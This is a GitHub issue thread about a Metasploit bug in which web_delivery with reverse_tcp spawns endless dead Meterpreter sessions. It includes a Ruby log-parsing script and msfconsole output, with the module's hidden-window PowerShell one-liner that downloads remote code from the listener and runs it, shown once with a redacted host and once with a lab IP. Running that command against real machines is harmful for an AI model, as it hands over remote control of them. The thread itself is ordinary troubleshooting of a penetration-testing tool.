rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Meterpreter sessions "spawning forever" with meterpreter/reverse_tcp + powershell web_delivery #9250

Closed MRGEffitas closed 7 years ago

MRGEffitas commented 7 years ago

Steps to reproduce

       =[ metasploit v4.16.20-dev-                        ]
+ -- --=[ 1703 exploits - 970 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf exploit(web_delivery) > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set TARGET 2
TARGET => 2
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set SRVHOST xxx.info
SRVHOST => xxx.info
msf exploit(web_delivery) > set LHOST xxx.info
LHOST => xxx.info
msf exploit(web_delivery) > set LPORT 4664
LPORT => 4664
msf exploit(web_delivery) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(web_delivery) > set ReverseListenerBindAddress 81.x.x.x
ReverseListenerBindAddress => 81.x.x.x
msf exploit(web_delivery) > set URIPATH web_delivery
URIPATH => web_delivery
msf exploit(web_delivery) > exploit -j
[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 81.x.x.x:4664
msf exploit(web_delivery) > [*] Using URL: http://xxx.info:8080/web_delivery
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://xxx.info:8080/web_delivery');
msf exploit(web_delivery) >

Executing the command on the Windows victim.

Expected behavior

One Meterpreter session opens.

Current behavior

An infinite number of sessions start, but none of them work. I tried with reverse_http, and reverse_http works.

[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 8 opened (81.x.x.x:4664 -> 37.x.x.x:50882) at 2017-11-28 16:37:46 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 9 opened (81.x.x.x:4664 -> 37.x.x.x:50883) at 2017-11-28 16:37:46 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 10 opened (81.x.x.x:4664 -> 37.x.x.x:50884) at 2017-11-28 16:37:47 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 11 opened (81.x.x.x:4664 -> 37.x.x.x:50885) at 2017-11-28 16:37:48 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 12 opened (81.x.x.x:4664 -> 37.x.x.x:50886) at 2017-11-28 16:37:50 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 13 opened (81.x.x.x:4664 -> 37.x.x.x:50887) at 2017-11-28 16:37:51 +0100

jobs -K

Stopping all jobs...
[*] Server stopped.
msf exploit(web_delivery) > [*] 37.x.x.x - Meterpreter session 8 closed.  Reason: Died
[*] 37.x.x.x - Meterpreter session 9 closed.  Reason: Died
[*] 37.x.x.x - Meterpreter session 10 closed.  Reason: Died
...
msf exploit(web_delivery) > [-] Failed to load extension: No response was received to the core_enumextcmd request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.

framework.log:

/opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[11/28/2017 16:42:52] [e(0)] meterpreter: Failed to load extension: No response was received to the core_enumextcmd request.
[11/28/2017 16:42:52] [d(0)] meterpreter: Call stack:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/client_core.rb:301:in `use'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1181:in `block in cmd_load'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1169:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1169:in `cmd_load'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:498:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:460:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:454:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:454:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:397:in `load_priv'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:166:in `block in bootstrap'
/opt/metasploit-framework/embedded/framework/lib/msf/core/session_manager.rb:171:in `block (2 levels) in initialize_scheduler_threads'

System stuff

Metasploit version

msf exploit(web_delivery) > version
Framework: 4.16.20-dev-
Console  : 4.16.20-dev-

I installed Metasploit with:

PTF

Ruby and gems versions

msf exploit(web_delivery) > ruby -v
[*] exec: ruby -v

ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]
msf exploit(web_delivery) > gem query --local
[*] exec: gem query --local

actionpack (4.2.10)
actionview (4.2.10)
activemodel (4.2.10)
activerecord (4.2.10)
activesupport (4.2.10)
addressable (2.5.2)
afm (0.2.2)
arel (6.0.4)
arel-helpers (2.5.0)
Ascii85 (1.0.2)
backports (3.10.3)
bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0)
bindata (2.4.1)
bit-struct (0.16)
builder (3.2.3)
bundler (1.16.0)
coderay (1.1.2)
concurrent-ruby (1.0.5)
crass (1.0.3)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.9.0)
factory_girl_rails (4.9.0)
faraday (0.13.1)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.5)
google-protobuf (3.5.0 x86_64-linux)
googleapis-common-protos-types (1.0.1)
googleauth (0.6.2)
grpc (1.7.2 x86_64-linux)
hashery (2.1.2)
i18n (0.9.1)
jsobfu (0.4.2)
json (2.1.0)
jwt (2.1.0)
little-plugger (1.1.4)
logging (2.2.2)
loofah (2.1.1)
memoist (0.16.0)
metasm (1.0.3)
metasploit-aggregator (1.0.0)
metasploit-concern (2.0.5)
metasploit-credential (2.0.12)
metasploit-framework (4.16.20)
metasploit-model (2.0.4)
metasploit-payloads (1.3.14)
metasploit_data_models (2.0.15)
metasploit_payloads-mettle (0.2.5)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
msgpack (1.1.0)
multi_json (1.12.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.1.1)
nokogiri (1.8.1)
octokit (4.7.0)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13)
patch_finder (1.0.2)
pcaprub (0.12.4)
pdf-reader (2.0.0)
pg (0.20.0)
pg_array_parser (0.0.9)
postgres_ext (3.0.0)
pry (0.11.3)
public_suffix (3.0.1)
rack (1.6.8)
rack-test (0.6.3)
rails-deprecated_sanitizer (1.0.3)
rails-dom-testing (1.0.8)
rails-html-sanitizer (1.0.3)
railties (4.2.10)
rake (12.3.0)
rb-readline (0.5.5)
rbnacl (4.0.2)
rbnacl-libsodium (1.0.15.1)
recog (2.1.16)
redcarpet (3.4.0)
rex-arch (0.1.13)
rex-bin_tools (0.1.4)
rex-core (0.1.12)
rex-encoder (0.1.4)
rex-exploitation (0.1.15)
rex-java (0.1.5)
rex-mime (0.1.5)
rex-nop (0.1.1)
rex-ole (0.1.6)
rex-powershell (0.1.77)
rex-random_identifier (0.1.4)
rex-registry (0.1.3)
rex-rop_builder (0.1.3)
rex-socket (0.1.9)
rex-sslscan (0.1.5)
rex-struct2 (0.1.2)
rex-text (0.2.15)
rex-zip (0.1.3)
rkelly-remix (0.0.7)
rspec (3.7.0)
rspec-core (3.7.0)
rspec-expectations (3.7.0)
rspec-mocks (3.7.0)
rspec-rails (3.7.2)
rspec-rerun (1.1.0)
rspec-support (3.7.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18)
rubyntlm (0.6.2)
rubyzip (1.2.1)
sawyer (0.8.1)
signet (0.8.1)
simplecov (0.15.1)
simplecov-html (0.10.2)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.20.0)
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.4)
tzinfo-data (1.2017.3)
windows_error (0.1.2)
xdr (2.0.0)
xmlrpc (0.3.0)
yard (0.9.11)

OS

Ubuntu 14.04.3 LTS
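The run-away handler output in the report above (a new staged session from the same peer every second or so, all of them later closing with "Reason: Died") is easy to spot by eye in a short run, but on a busy listener it is worth checking mechanically. The following Ruby script is an added example, not code from this issue or from the Metasploit Framework itself; it parses msfconsole handler lines of the two shapes shown above ("session N opened (...) at ..." and "session N closed. Reason: ...") and flags any peer that opens several staged sessions within a short window, together with how many of those sessions died. The log lines, addresses, thresholds and function names are constructed for the example.

```ruby
require 'time'

# Handler messages of the two shapes shown in the issue's msfconsole output.
OPEN_RE  = /Meterpreter session (\d+) opened \((\S+) -> ([^:]+):(\d+)\) at (.+)$/
CLOSE_RE = /Meterpreter session (\d+) closed\.\s+Reason: (\w+)/

# Constructed sample log (not taken from the issue): one peer re-stages six
# times in a few seconds and every session dies; a second peer opens one
# session that stays up. Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = <<~LOG
  [*] Sending stage (179267 bytes) to 198.51.100.23
  [*] Meterpreter session 8 opened (192.0.2.1:4664 -> 198.51.100.23:50882) at 2017-11-28 16:37:46 +0100
  [*] Sending stage (179267 bytes) to 198.51.100.23
  [*] Meterpreter session 9 opened (192.0.2.1:4664 -> 198.51.100.23:50883) at 2017-11-28 16:37:46 +0100
  [*] Sending stage (179267 bytes) to 198.51.100.23
  [*] Meterpreter session 10 opened (192.0.2.1:4664 -> 198.51.100.23:50884) at 2017-11-28 16:37:47 +0100
  [*] Sending stage (179267 bytes) to 198.51.100.23
  [*] Meterpreter session 11 opened (192.0.2.1:4664 -> 198.51.100.23:50885) at 2017-11-28 16:37:48 +0100
  [*] Sending stage (179267 bytes) to 198.51.100.23
  [*] Meterpreter session 12 opened (192.0.2.1:4664 -> 198.51.100.23:50886) at 2017-11-28 16:37:50 +0100
  [*] Sending stage (179267 bytes) to 198.51.100.23
  [*] Meterpreter session 13 opened (192.0.2.1:4664 -> 198.51.100.23:50887) at 2017-11-28 16:37:51 +0100
  [*] Sending stage (179267 bytes) to 203.0.113.9
  [*] Meterpreter session 14 opened (192.0.2.1:4664 -> 203.0.113.9:51000) at 2017-11-28 16:40:02 +0100
  [*] 198.51.100.23 - Meterpreter session 8 closed.  Reason: Died
  [*] 198.51.100.23 - Meterpreter session 9 closed.  Reason: Died
  [*] 198.51.100.23 - Meterpreter session 10 closed.  Reason: Died
  [*] 198.51.100.23 - Meterpreter session 11 closed.  Reason: Died
  [*] 198.51.100.23 - Meterpreter session 12 closed.  Reason: Died
  [*] 198.51.100.23 - Meterpreter session 13 closed.  Reason: Died
LOG

# Parse handler output into { session_id => details }. Close lines for a
# session we never saw open are ignored rather than raising.
def parse_handler_log(text)
  sessions = {}
  text.each_line do |line|
    if (m = OPEN_RE.match(line))
      sessions[m[1].to_i] = {
        listener: m[2], peer: m[3], peer_port: m[4].to_i,
        opened_at: Time.strptime(m[5].strip, '%Y-%m-%d %H:%M:%S %z'),
        closed_reason: nil
      }
    elsif (m = CLOSE_RE.match(line))
      id = m[1].to_i
      sessions[id][:closed_reason] = m[2] if sessions.key?(id)
    end
  end
  sessions
end

# Flag peers that opened at least `threshold` sessions inside any `window`
# seconds. Returns { peer => { sessions:, peak:, died: } } for flagged peers.
def session_storms(sessions, threshold: 3, window: 10)
  storms = {}
  sessions.values.group_by { |s| s[:peer] }.each do |peer, list|
    times = list.map { |s| s[:opened_at] }.sort
    # Sliding window over the sorted open times: largest burst seen.
    peak = times.each_index.map do |i|
      times[i..-1].take_while { |u| u - times[i] <= window }.size
    end.max
    next if peak < threshold

    storms[peer] = {
      sessions: list.size,
      peak: peak,
      died: list.count { |s| s[:closed_reason] == 'Died' }
    }
  end
  storms
end

if $PROGRAM_NAME == __FILE__
  sessions = parse_handler_log(SAMPLE_LOG)
  session_storms(sessions).each do |peer, info|
    puts "#{peer}: #{info[:sessions]} sessions, #{info[:peak]} within one window, #{info[:died]} died"
  end
end
```

Run it against a pasted msfconsole transcript (or feed it `framework.log` lines of the same shape) to separate a retry loop like the one in this issue from a single healthy stage: a peer with one open and no "Died" close is normal, while a peer whose burst count equals its death count has never completed staging. The window and threshold are deliberately loose defaults; tune them to how quickly your own handler normally completes a stage.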

busterb commented 7 years ago

Interesting, thanks. I haven't managed to reproduce this yet, though I'm also not using a hostname for my LHOST, but rather an IP address. Could this be a DNS resolution issue with the reverse_tcp stager? Is this a scenario that worked with a previous version? Have you tried windows/meterpreter_reverse_tcp instead?

msf exploit(web_delivery) > [*] Using URL: http://192.168.56.1:8080/xnZeDVG3Wlu0B
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $f=new-object net.webclient;$f.proxy=[Net.WebRequest]::GetSystemWebProxy();$f.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $f.downloadstring('http://192.168.56.1:8080/xnZeDVG3Wlu0B');
[*] 192.168.56.102   web_delivery - Delivering Payload
[*] Sending stage (179267 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:49806) at 2017-11-28 11:30:57 -0600

msf exploit(web_delivery) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-K2I1LJF
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

MRGEffitas commented 7 years ago

Yesterday, I tried this like 5 times, same thing happened (I closed msfconsole every time).

Today, while trying reverse_http, I got the following error out of the blue. I never played with this StagerRetryWait before:

msf exploit(web_delivery) > exploit -j
[-] Exploit failed: The following options failed to validate: StagerRetryWait.
[*] Exploit completed, but no session was created.

After setting StagerRetryWait, I cannot reproduce the issue anymore. I think it is OK to close the issue, thank you for your help.